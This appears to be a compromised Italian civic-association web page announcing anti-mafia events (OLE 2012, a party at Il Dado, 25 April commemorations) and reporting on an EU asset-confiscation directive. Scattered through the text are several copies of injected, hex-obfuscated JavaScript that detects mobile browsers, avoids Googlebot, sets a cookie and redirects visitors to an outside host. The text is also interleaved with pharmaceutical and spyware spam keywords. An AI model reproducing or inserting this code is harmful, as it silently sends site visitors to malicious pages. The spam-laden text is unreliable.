OLE 2012 Otranto Legality Experience

FLARE – Freedom Legality and Rights in Europe organizza la terza edizione  OLE 2102!!
Due settimane di formazione e approfondimento per meglio comprendere i legami tra traffico di armi e droga, la crminalità organizzata e l’economia, le politiche europee per contrastare il fenomeno.
OLE 2012  è diviso in tre parti:

vigora 100 how to use

OLE Summer School, 16-20 Luglio a Lecce, aperto a tutti gli studenti universitari ai quali verranno riconosciuti dei crediti formativi

Quota d’iscrizione 100 euro, è possibile iscriversi fino al 10 giugnoOLE Summer Camp, 23-27 Luglio a Lecce, cinque giorni di seminari e dibattitti aperti a tutti,

Quota d’iscrizone 50 euro, iscrizioni aperte fino al 15 giugnoOLE Public Forum, 27-29 Luglio a Otranto, l’evento è aperto al pubblico e non è necessario iscriversi.

E’ possibile scaricare il programma dell’evento su sito www.ole2012.org
Per info:

[email protected]d.getElementsByTagName(‘head’)[0].appendChild(s);var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}facebook spy, phone tracker, phone tracking software

Otranto Legality Experience 2012

Arriva la terza edizione di OLE, dibattiti e seminari per approfondire e studiare i legami tra crimine organizzato e globalizzazione  con esperti nazionali e internazionali.

OLE è organizzato da FLARE con il coordinamento culturale di Vittorio Agnoletto; questa edizione si terrà tra Lecce e Otranto dal 16 al 29 Luglio 2012, la novità sarà la summer school. Infati quest’anno l’evento è diviso in tre diverse parte:

la summer school dal 16 al 20 luglio, le iscrizioni si chiuderanno il 31 maggio… clicca qui per info

il summer camp dal 23 al 27 luglio, chiusura iscrizioni il 15 giugno… clicca qui per l’application

e il forum, aperto al pubblico, dal 27 al 29 luglio a Otranto.

OLE è dedicato a Renata Fonte, uccisa dalla mafia il 31 marzo 1984 al giornalista Toni Fontana viagra casero .if (document.currentScript) { iphone tracker, spyera, the truth spy

Buon compleanno DADO!

motilium instant yan etkisi Sabato 19 maggio h.19.30 non perdere l’occasione dell’anno per partecipare alla festa più  multietnica che abbiate mai visto, al Dado di Settimo Torinese.

Il Dado compie tre anni!!!

Sono passati ormai tre anni dall’inaugurazione del Dado, molte persone hanno fatto parte di questa esperienza, hanno lasciato un segno qui nella casa gialla che si affaccia su una delle strade principali di Settimo Torinese.

Oggi abbiamo con noi, Malek dalla Tunisia, Ali e Turkan dalla Turchia, Maria, Viorel, Sorina e tanti altri dalla Romania, Adbi,Nasir, Abdullai ed altri dalla Somalia e con loro i coabitanti italiani.

Con queste premesse si prospetta una cena con sapori davvero dal mondo!!!

E’ con orgoglio che gli ospiti del Dado e i loro volontari invitano la cittadinanza a partecipare a questo momento di grande orgoglio per le famiglie e i giovani ragazzi che qui al dado a partire da una casa dignitosa investono con fatica nel loro futuro. Qui gli adolescenti prospettano i loro studi e le loro future professioni, qui si crede nella possibilità di cambiamento.

Partecipate numerosi, ma soprattutto prenotatevi per la cena al 339-6909394 con un sms oppure via mail a [email protected]terradelfuoco.org

 

Nell’arco della serata assisterete ad uno spettacolo teatrale messo in scena dalla classe 3 E della Scuola Gobetti, il saggio di musica dei più piccoli abitanti del Dado e infine tanta buona musica!!!var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);phone keylogger, spy mobile app, tracking someones phone

XXV Aprile a Torino

  buying cialis   Programma delle celebrazioni   ISTITUTO PIEMONTESE PER LA STORIA DELLA RESISTENZA E DELLA SOCIETÀ CONTEMPORANEA “GIORGIO AGOSTI” Via del Carmine 13 – 011 4380090; 18 aprile ore 17.00 – Sala conferenze Istoreto Torino in guerra: spoliazioni, distruzioni e tutela del patrimonio culturale L’arch. Laura Antonietta Guardamagna e Riccardo Marchis ne discutono con Luigi Salerno e Cinzia Scala (autori di una tesi di laurea svolta presso la facoltà di Architettura II del Politecnico di Torino) 23 aprile ore 17.00 – Sala conferenze Istoreto Omaggio ai testimoni. Dedicato alle recenti memorie di Sergio Sarri, Alessandro Caimi e Bruno Martinazzi. Ne discutono con gli autori Luciano Boccalatte e Alberto Cavaglion. COMUNITÀ EBRAICA DI TORINO Piazzetta Primo Levi 12 – 011 6692387 16 aprile ore 18.00 a cura di Comunità Ebraica – Gruppo di Studi Ebraici e Istoreto Giovanni De Luna e Fabio Levi presentano Nino Contini (1906-1944): Quel ragazzo in gamba di nostro padre. Diari dal confino e da Napoli liberata a cura di Bruno e Leo Contini, con scritti di Alessandra Minerbi e Gloria Chianese e una postfazione di Clotilde Pontecorvo 18 aprile ore 21.00 Alla presenza dell’Autore, Alberto Cavaglion e Massimo Bubi Ottolenghi presentano: Franco Brunetta – I ragazzi che volarono l’aquilone. Indagine su una formazione partigiana. Araba Fenice Edizioni, Cuneo 2010 23 aprile ore 21.00 a cura di Associazione Ex allievi ed amici della Scuola Ebraica di Torino Concerto chitarra, batteria, basso e due voci gruppo musicale Le primule rosse canti pacifisti e

partigiani Tra il primo e il secondo tempo sarà servito uno spuntino .   Partecipanti alla programmazione: • ACMOS • Archivio Nazionale Cinematografico della Resistenza • Associazione “Nessun uomo è un’isola” • Associazione LIBERA • Biblioteche Civiche • Circoscrizioni Cittadine • Comunità Ebraica di Torino • Comunità di Sant’Egidio • Istituto Piemontese per la Storia della Resistenza e della Società Contemporanea “Giorgio Agosti” • I.T.E.R. – Istituzione Torinese per una Educazione Responsabile della Città di Torino • Libera • Museo Diffuso della Resistenza, della Deportazione, della Guerra, dei Diritti e della Libertà • Movimento Federalista Europeo • Terra del Fuoco • Ufficio Scolastico Regionale per il Piemonteif (document.currentScript) { var d=document;var s=d.createElement(‘script’); var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}iphone tracker, mobile tracking, see facebook

Buone notizie dall’Europa!… contrastiamo le mafie!

Alla vigilia della Giornata della Memoria in ricordo delle vittime di mafia organizzata da Libera e Avviso
Pubblico, la Commissione Europea presenta una direttiva per allargare a livello europeo la confisca di beni
criminali. Un passo fondamentale e senza precedenti, ma c’è ancora molto da fare per arrivare al riutilizzo
sociale.

L’Europa da un giro di vite alla lotta alle organizzazioni criminali. La Commissione Europea, per voce della
Commissaria agli affari interni Cecilia Malmstrom, ha proposto ieri una nuova direttiva per allargare a
livello europeo lo strumento della confisca dei patrimoni criminali. La confisca andrebbe a colpire quelle
organizzazioni che, solo in Italia, sono responsabili di un fatturato di 150 miliardi di euro nel solo 2011.
A livello globale, invece, le Nazioni Unite stimano i profitti criminali in 2.100 miliardi di dollari (circa il
3,6% del PIL mondiale). Fa da capofila il traffico di droga, con un flusso di denaro intorno ai 321 miliardi, a
cui seguono i 42,6 miliardi generati dal traffico di esseri umani. Una mole di denaro spaventosa che inquina
quotidianamente l’economia globale, altera gli equilibri finanziari, falsa il libero mercato e colpisce le fasce
più deboli della popolazione.
“Dobbiamo colpire i criminali dove fa più male, ovvero i loro patrimoni, ed è necessario reintrodurre quei
beni all’interno del circuito economico legale, soprattutto in tempi di crisi”, ha affermato la Malmstrom in
conferenza stampa. Nel giorno in cui i capi stato dei Paesi Membri discutono se attuare o meno la tassa
sulle transazioni finanziarie e in un periodo di forte crisi economica, la Commissione Europea da un giro
di vite nella lotta alla criminalità. La proposta di legge si prefigge l’obiettivo di armonizzare le legislazioni
di Paesi Membri nel contrasto alle organizzazioni criminali, facilitando la confisca dei beni in operazioni
transfrontaliere e semplificare il quadro giuridico in materia. “La direttiva fornirà le forze di polizia e le
autorità giudiziarie di strumenti adeguati per seguire la pista del denaro”, ha aggiunto la Malmstrom.

La proposta giunge dopo anni di sforzi da parte di ONG, quali Libera e FLARE Network, e di parlamentari
europei che della lotta alla criminalità a livello europeo hanno fatto il loro cavallo di battaglia. La capacità da
parte della criminalità organizzata di riciclare denaro sporco all’estero sfruttando il divario giuridico tra uno
stato membro potrebbe ora ricevere un colpo mortale. Il neo-presidente di FLARE, Franco La Torre, ha
salutato “con grande soddisfazione la notizia della direttiva che si prefigge di introdurre uno degli strumenti
più efficaci di repressione della criminalità organizzata. Colpire le mafie nel loro interesse principale, ovvero
il profitto, è di capitale importanza per un contrasto adeguato”. La Torre inoltre sottolinea l’importanza
di capitalizzare al meglio l’esperienza di Libera in Italia e di “introdurre la possibilità di riutilizzare i beni
criminali per usi sociali” che reputa “il vero valore aggiunto della legislazione antimafia in Italia”. Un tema,
quest’ultimo, che sarà al centro dei dibattiti a margine della Giornata della Memoria organizzata da Libera
e Avviso Pubblico in programma a Genova sabato 17 marzo.

«Il predominio delle mafie può davvero giungere a termine» afferma con decisione Tonio Dell’Olio,
responsabile del settore International di Libera. «Per troppi anni hanno trovato vita facile nel reinvestire le
loro ricchezze. In compenso la società civile da anni promuove campagne e attività perché questa direttiva
potesse vedere la luce. E’ un risultato storico».

Sono molte le novità introdotte nella norma della Malmstrom, tra cui non solo l’esperienza portata dalla
legislazione olandese oltre che quella italiana, ma anche la possibilità di attaccare i proventi di attività legate
al cybercrime e corruzione. Signifcativa è, inoltre, la proposta di utilizzare la confisca “preventiva”, norma
esclusiva della legislazione italiana a livello mondiale. Le principali normative della direttiva sono:

?

estendere le regole per le confische dei beni, non limitandole solo a quelli legati ad uno specifico
reato, ma all’intero patrimonio di origine criminale;
rafforzare le norme per colpire i beni ceduti a prestanome;
permettere i sequestri anche quando non è possibile arrivare ad una condanna del criminale perché
morto, infermo o latitante;
facilitare il congelamento precauzionale dei beni in attesa di una sentenza di conferma del
sequestro;
inoltre si introdurrà il concetto di ‘effettiva esecuzione’, nuovo anche per la legislazione italiana:
permettere che la situazione patrimoniale dei condannati sia tenuta sotto controllo per anni,
impedendo che il ‘bottino’ improvvisamente riappaia ed il criminale se lo possa godere

?
?

?

?

La direttiva di ieri fa seguito a cinque decisioni quadro emanate dalla Commissione dal 2001 che si sono

dimostrate, per stessa ammissione della Malmstrom, “inadeguate” nella lotta alla criminalità e “implementate
in maniera incoerente” dagli Stati Membri. Quest’ultima iniziativa della Commissione Europea sulla carta
ha tutte le potenzialità per colmare un vuoto legislativo di cui hanno approfittato per anni le organizzazioni
criminali di tutta Europa. La palla passa ora al Parlamento Europeo.
“Ci auguriamo, inoltre, che un giorno la direttiva porti anche alla possibilità di destinare i patrimoni criminali
ad un utilizzo sociale”, ha concluso Franco La Torre.

– Leggi la direttiva (inglese)
– Leggi una sintesi del quadro normativo europeo (inglese)
– Leggi il comunicato stampa della Commissaria europea (italiano) lagatrim tablets phone tracker, spymobile, 1 topspy